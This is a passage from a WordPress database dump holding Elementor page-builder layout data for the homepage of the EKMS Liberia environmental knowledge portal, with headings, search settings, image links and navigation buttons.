kmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/featured_maps.jpg\"}],\"background_slideshow_ken_burns_zoom_direction\":\"out\",\"background_slideshow_slide_transition\":\"slide_left\"},\"elements\":[{\"id\":\"ghttmw8\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"background_background\":\"classic\",\"background_color\":\"rgba(255,255,255,0.04)\",\"padding\":{\"unit\":\"px\",\"top\":\"130\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"3q0r5o4\",\"elType\":\"widget\",\"settings\":{\"title\":\"Welcome to the EKMS\",\"align\":\"center\",\"title_color\":\"#014421\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":65},\"typography_text_transform\":\"uppercase\",\"typography_letter_spacing\":{\"unit\":\"px\",\"size\":1},\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"4\",\"left\":\"0\",\"isLinked\":false},\"_css_classes\":\"no-margin\",\"typography_font_size_mobile\":{\"unit\":\"px\",\"size\":25},\"typography_font_family\":\"Roboto\",\"typography_font_weight\":\"900\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"f0wlz1l\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>The EKMS provides free and open access to information from key government and partner institutions relating to the implementation of Rio Conventions. Explore the Knowledge Resources by Related Topics, Institutions and Documents.<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"10\",\"left\":\"0\",\"isLinked\":false},\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":26,\"sizes\":[]},\"typography_font_weight\":\"600\",\"typography_font_family\":\"Roboto\",\"typography_line_height\":{\"unit\":\"em\",\"size\":1.1999999999999999555910790149937383830547332763671875,\"sizes\":[]},\"typography_letter_spacing\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"f4a4a39\",\"elType\":\"widget\",\"settings\":{\"search_placeholder_text\":\"Search Knowledge Resources...\",\"show_search_category_list\":\"yes\",\"search_category_select_placeholder\":\"Entire Resource\",\"results_counter_text\":\"Results\",\"full_results_btn_text\":\"See all results\",\"title_related_meta\":[{\"meta_label\":\"Label\",\"_id\":\"c6a37ad\",\"meta_key\":\"\",\"meta_format\":\"%s\",\"meta_callback\":\"\",\"date_format\":\"F j, Y\"}],\"content_related_meta\":[{\"meta_label\":\"Label\",\"_id\":\"c698fbe\",\"meta_key\":\"\",\"meta_format\":\"%s\",\"meta_callback\":\"\",\"date_format\":\"F j, Y\"}],\"negative_search\":\"Sorry, but nothing matched your search terms.\",\"server_error\":\"Sorry, but we cannot handle your search query now. Please, try again later!\",\"search_submit_bg_color\":\"rgba(0,100,0,0.86)\",\"search_category_color\":\"#000000\",\"search_taxonomy\":\"resource_category\",\"search_source\":[\"document\",\"institution\",\"mea_resource\",\"project_resource\",\"related_topic\"]},\"elements\":[],\"widgetType\":\"jet-ajax-search\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"3b467af\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"4a9f59c\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"padding\":{\"unit\":\"px\",\"top\":\"40\",\"right\":\"0\",\"bottom\":\"40\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"fb58b71\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"f8f4095\",\"elType\":\"widget\",\"settings\":{\"title\":\"Select a Topic\",\"header_size\":\"h1\",\"align\":\"center\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":35,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"62059d5\",\"elType\":\"widget\",\"settings\":{\"style\":\"dotted\",\"width\":{\"unit\":\"%\",\"size\":10,\"sizes\":[]},\"align\":\"center\",\"text\":\"Divider\",\"color\":\"#54595f\",\"weight\":{\"unit\":\"px\",\"size\":7,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"divider\"},{\"id\":\"cc6fadf\",\"elType\":\"widget\",\"settings\":{\"min_height\":{\"unit\":\"px\",\"size\":450,\"sizes\":[]},\"show_terms\":\"\",\"show_terms_num\":\"2\",\"excerpt_length\":\"\",\"excerpt_trimmed_ending\":\"...\",\"show_date\":\"\",\"post_type\":\"related_topic\",\"custom_query_by\":\"ids\",\"post_ids\":\"468,470,473,474,487\",\"title_related_meta\":[{\"meta_label\":\"Label\",\"_id\":\"5b2266b\",\"meta_key\":\"\",\"meta_format\":\"%s\",\"meta_callback\":\"\",\"date_format\":\"F j, Y\"}],\"content_related_meta\":[{\"meta_label\":\"Label\",\"_id\":\"76431bc\",\"meta_key\":\"\",\"meta_format\":\"%s\",\"meta_callback\":\"\",\"date_format\":\"F j, Y\"}],\"boxes_gap\":{\"unit\":\"px\",\"size\":5,\"sizes\":[]},\"boxes_title_color\":\"#ffffff\",\"boxes_title_color_hover\":\"#006400\",\"boxes_title_typography_typography\":\"custom\",\"boxes_title_typography_font_size\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"boxes_title_typography_font_weight\":\"900\",\"boxes_title_alignment\":\"left\"},\"elements\":[],\"widgetType\":\"jet-blog-smart-tiles\"},{\"id\":\"724fd77\",\"elType\":\"widget\",\"settings\":{\"text\":\"Explore All Topics\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/related-topics\\/\",\"is_external\":\"\",\"nofollow\":\"\"},\"align\":\"center\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15,\"sizes\":[]},\"typography_text_transform\":\"uppercase\",\"button_text_color\":\"#ffffff\",\"background_color\":\"#006400\",\"hover_color\":\"#ffffff\",\"button_background_hover_color\":\"#014421\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"89e8d8c\",\"elType\":\"section\",\"settings\":{\"stretch_section\":\"section-stretched\",\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"0fea759\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/home_4.jpg\",\"id\":258},\"background_position\":\"center center\",\"background_attachment\":\"fixed\",\"background_size\":\"cover\",\"padding\":{\"unit\":\"px\",\"top\":\"70\",\"right\":\"0\",\"bottom\":\"70\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"5c4a65b\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"100\",\"bottom\":\"0\",\"left\":\"150\",\"isLinked\":false}},\"elements\":[{\"id\":\"b82855d\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"45201a0\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"9b26f8f\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"15\",\"bottom\":\"0\",\"left\":\"15\",\"isLinked\":false}},\"elements\":[{\"id\":\"8d9d9b1\",\"elType\":\"widget\",\"settings\":{\"title\":\"Explore by Institution\",\"title_color\":\"#ffffff\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":50,\"sizes\":[]},\"typography_font_weight\":\"600\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"7448ecc\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Explore Government and partner Institutions that have direct linkages with environmental policies and development.<\\/p>\",\"text_color\":\"#ffffff\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":30,\"sizes\":[]},\"typography_font_weight\":\"500\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"cdd4f69\",\"elType\":\"widget\",\"settings\":{\"text\":\"Explore By Insitution\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/institutions-resources\\/\",\"is_external\":\"\",\"nofollow\":\"\"},\"align\":\"left\",\"selected_icon\":{\"value\":\"fas fa-long-arrow-alt-right\",\"library\":\"fa-solid\"},\"icon_align\":\"right\",\"icon_indent\":{\"unit\":\"px\",\"size\":10,\"sizes\":[]},\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15,\"sizes\":[]},\"typography_text_transform\":\"uppercase\",\"button_text_color\":\"#ffffff\",\"background_color\":\"#006400\",\"hover_color\":\"#ffffff\",\"button_background_hover_color\":\"#014421\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false},{\"id\":\"a2777f6\",\"elType\":\"section\",\"settings\":{\"stretch_section\":\"section-stretched\",\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"0fea759\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/featured_land_climate.jpg\",\"id\":493},\"background_position\":\"center center\",\"background_attachment\":\"fixed\",\"background_size\":\"cover\",\"padding\":{\"unit\":\"px\",\"top\":\"70\",\"right\":\"0\",\"bottom\":\"70\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"cc16d03\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"100\",\"bottom\":\"0\",\"left\":\"150\",\"isLinked\":false}},\"elements\":[{\"id\":\"b4fc23b\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"45201a0\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"f419151\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"15\",\"bottom\":\"0\",\"left\":\"15\",\"isLinked\":false}},\"elements\":[{\"id\":\"99692db\",\"elType\":\"widget\",\"settings\":{\"title\":\"Explore by Document\",\"title_color\":\"#ffffff\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":50,\"sizes\":[]},\"typography_font_weight\":\"600\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"f7b0473\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Explore the EKMS Documents Database.<\\/p>\",\"text_color\":\"#ffffff\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":30,\"sizes\":[]},\"typography_font_weight\":\"500\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"259a529\",\"elType\":\"widget\",\"settings\":{\"text\":\"Explore All Documents\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/documents-database\\/\",\"is_external\":\"\",\"nofollow\":\"\"},\"align\":\"left\",\"selected_icon\":{\"value\":\"fas fa-long-arrow-alt-right\",\"library\":\"fa-solid\"},\"icon_align\":\"right\",\"icon_indent\":{\"unit\":\"px\",\"size\":10,\"sizes\":[]},\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15,\"sizes\":[]},\"typography_text_transform\":\"uppercase\",\"button_text_color\":\"#ffffff\",\"background_color\":\"#006400\",\"hover_color\":\"#ffffff\",\"button_background_hover_color\":\"#014421\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false},{\"id\":\"8aa33ed\",\"elType\":\"section\",\"settings\":{\"stretch_section\":\"section-stretched\",\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"db429d4\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"background_background\":\"classic\",\"shape_divider_bottom_width\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"shape_divider_bottom_height\":{\"unit\":\"px\",\"size\":82,\"sizes\":[]},\"shape_divider_bottom_flip\":\"yes\",\"padding\":{\"unit\":\"px\",\"top\":\"50\",\"right\":\"0\",\"bottom\":\"50\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"5a37cd7\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"df23907\",\"elType\":\"widget\",\"settings\":{\"title\":\"Latest News & Blogs\",\"header_size\":\"h1\",\"align\":\"center\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":35,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"339607e\",\"elType\":\"widget\",\"settings\":{\"style\":\"dotted\",\"width\":{\"unit\":\"%\",\"size\":10,\"sizes\":[]},\"align\":\"center\",\"text\":\"Divider\",\"color\":\"#54595f\",\"weight\":{\"unit\":\"px\",\"size\":7,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"divider\"},{\"id\":\"684051a\",\"elType\":\"widget\",\"settings\":{\"number\":4,\"columns\":\"4\",\"equal_height_cols\":\"true\",\"title_trimmed\":\"yes\",\"title_length\":10,\"title_trimmed_ending_text\":\"...\",\"excerpt_length\":10,\"show_terms\":\"yes\",\"show_meta\":\"\",\"show_more\":\"\",\"more_text\":\"Read More\",\"title_related_meta\":[{\"meta_label\":\"Label\",\"_id\":\"537281f\",\"meta_key\":\"\",\"meta_format\":\"%s\",\"meta_callback\":\"\",\"date_format\":\"F j, Y\"}],\"content_related_meta\":[{\"meta_label\":\"Label\",\"_id\":\"821cf97\",\"meta_key\":\"\",\"meta_format\":\"%s\",\"meta_callback\":\"\",\"date_format\":\"F j, Y\"}],\"content_bg\":\"rgba(0,100,0,0.59)\",\"content_padding\":{\"unit\":\"px\",\"top\":\"10\",\"right\":\"10\",\"bottom\":\"0\",\"left\":\"15\",\"isLinked\":false},\"title_color\":\"#ffffff\",\"title_typography_typography\":\"custom\",\"title_typography_font_size\":{\"unit\":\"px\",\"size\":16,\"sizes\":[]},\"title_typography_font_weight\":\"900\",\"excerpt_color\":\"rgba(255,255,255,0.75)\",\"excerpt_typography_typography\":\"custom\",\"excerpt_typography_font_size\":{\"unit\":\"px\",\"size\":13,\"sizes\":[]},\"terms_link_typography_typography\":\"custom\",\"terms_link_typography_font_size\":{\"unit\":\"px\",\"size\":10,\"sizes\":[]},\"terms_link_bg_color\":\"#6ec1e4\",\"title_color_hover\":\"#000000\"},\"elements\":[],\"widgetType\":\"jet-posts\"},{\"id\":\"c151e2c\",\"elType\":\"widget\",\"settings\":{\"text\":\"Read All News & Blogs\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/news-and-blogs\\/\",\"is_external\":\"\",\"nofollow\":\"\"},\"align\":\"center\",\"selected_icon\":{\"value\":\"fas fa-long-arrow-alt-right\",\"library\":\"fa-solid\"},\"icon_align\":\"right\",\"icon_indent\":{\"unit\":\"px\",\"size\":10,\"sizes\":[]},\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15,\"sizes\":[]},\"typography_text_transform\":\"uppercase\",\"button_text_color\":\"#ffffff\",\"background_color\":\"#006400\",\"hover_color\":\"#ffffff\",\"button_background_hover_color\":\"#014421\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"d48ccf5\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"37e777c\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"0881e40\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"290555e\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":25,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"533b1b7\",\"elType\":\"section\",\"settings\":{\"stretch_section\":\"section-stretched\",\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"a8f2e29\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"background_background\":\"classic\",\"background_color\":\"#000000\",\"padding\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"30\",\"bottom\":\"30\",\"left\":\"30\",\"isLinked\":true}},\"elements\":[{\"id\":\"46a8277\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"8076ded\",\"elType\":\"widget\",\"settings\":{\"title\":\"Start Contributing to the EKMS\",\"description\":\"Does your organization or institution work to complement the growing agenda on the Rio Conventions within Liberia? Are you interested in contributing to the knowledge resources by submitting a blog, news, case study, report or a publication?\",\"btn_text\":\"Join the team\",\"btn_link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/contribute\\/\",\"is_external\":\"\",\"nofollow\":\"\"},\"icon\":\"fa fa-angle-double-right\",\"icon_align\":\"right\",\"icon_indent\":{\"unit\":\"px\",\"size\":10,\"sizes\":[]},\"title_color\":\"#006400\",\"description_color\":\"#ffffff\",\"button_background_color\":\"#006400\",\"button_background_hover_color\":\"#014421\"},\"elements\":[],\"widgetType\":\"oew-call-to-action\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"2c527f4\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"6472317\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"39c4f0e\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[],\"isInner\":false}],\"isInner\":false}]'),(19447,2849,'_elementor_version','2.7.5'),(19448,2849,'_elementor_template_type','wp-page'),(19449,2849,'_elementor_page_settings','a:1:{s:21:\"background_background\";s:7:\"classic\";}'),(19452,2850,'_wp_page_template','default'),(19453,2850,'_elementor_edit_mode','builder'),(19454,2850,'_elementor_data','[{\"id\":\"lnk9sxt\",\"elType\":\"section\",\"settings\":{\"content_width\":{\"unit\":\"px\",\"size\":900},\"height\":\"min-height\",\"custom_height\":{\"unit\":\"px\",\"size\":600},\"background_background\":\"slideshow\",\"background_position\":\"center center\",\"background_attachment\":\"fixed\",\"background_repeat\":\"no-repeat\",\"background_size\":\"cover\",\"background_overlay_background\":\"classic\",\"background_overlay_color\":\"rgba(255,255,255,0.78)\",\"background_overlay_opacity\":{\"unit\":\"px\",\"size\":0.5500000000000000444089209850062616169452667236328125},\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"fabc2a1\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"background_slideshow_gallery\":[{\"id\":2035,\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/featured_epa.jpg\"},{\"id\":2036,\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/featured_home1.jpg\"},{\"id\":2037,\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/featured_home2.jpg\"},{\"id\":2038,\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/featured_home3.jpg\"},{\"id\":2039,\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/featured_maps.jpg\"}],\"background_slideshow_ken_burns_zoom_direction\":\"out\",\"background_slideshow_slide_transition\":\"slide_left\"},\"elements\":[{\"id\":\"ghttmw8\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"background_background\":\"classic\",\"background_color\":\"rgba(255,255,255,0.04)\",\"padding\":{\"unit\":\"px\",\"top\":\"130\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"3q0r5o4\",\"elType\":\"widget\",\"settings\":{\"title\":\"Welcome to the EKMS\",\"align\":\"center\",\"title_color\":\"#014421\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":65},\"typography_text_transform\":\"uppercase\",\"typography_letter_spacing\":{\"unit\":\"px\",\"size\":1},\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"4\",\"left\":\"0\",\"isLinked\":false},\"_css_classes\":\"no-margin\",\"typography_font_size_mobile\":{\"unit\":\"px\",\"size\":25},\"typography_font_family\":\"Roboto\",\"typography_font_weight\":\"900\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"f0wlz1l\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>The EKMS provides free and open access to information from key government and partner institutions relating to the implementation of Rio Conventions. Explore the Knowledge Resources by Related Topics, Institutions and Documents.<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"10\",\"left\":\"0\",\"isLinked\":false},\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":26,\"sizes\":[]},\"typography_font_weight\":\"600\",\"typography_font_family\":\"Roboto\",\"typography_line_height\":{\"unit\":\"em\",\"size\":1.1999999999999999555910790149937383830547332763671875,\"sizes\":[]},\"typography_letter_spacing\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"f4a4a39\",\"elType\":\"widget\",\"settings\":{\"search_placeholder_text\":\"Search Knowledge Resources...\",\"show_search_category_list\":\"yes\",\"search_category_select_placeholder\":\"Entire Resource\",\"results_counter_text\":\"Results\",\"full_results_btn_text\":\"See all results\",\"title_related_meta\":[{\"meta_label\":\"Label\",\"_id\":\"c6a37ad\",\"meta_key\":\"\",\"meta_format\":\"%s\",\"meta_callback\":\"\",\"date_format\":\"F j, Y\"}],\"content_related_meta\":[{\"meta_label\":\"Label\",\"_id\":\"c698fbe\",\"meta_key\":\"\",\"meta_format\":\"%s\",\"meta_callback\":\"\",\"date_format\":\"F j, Y\"}],\"negative_search\":\"Sorry, but nothing matched your search terms.\",\"server_error\":\"Sorry, but we cannot handle your search query now. Please, try again 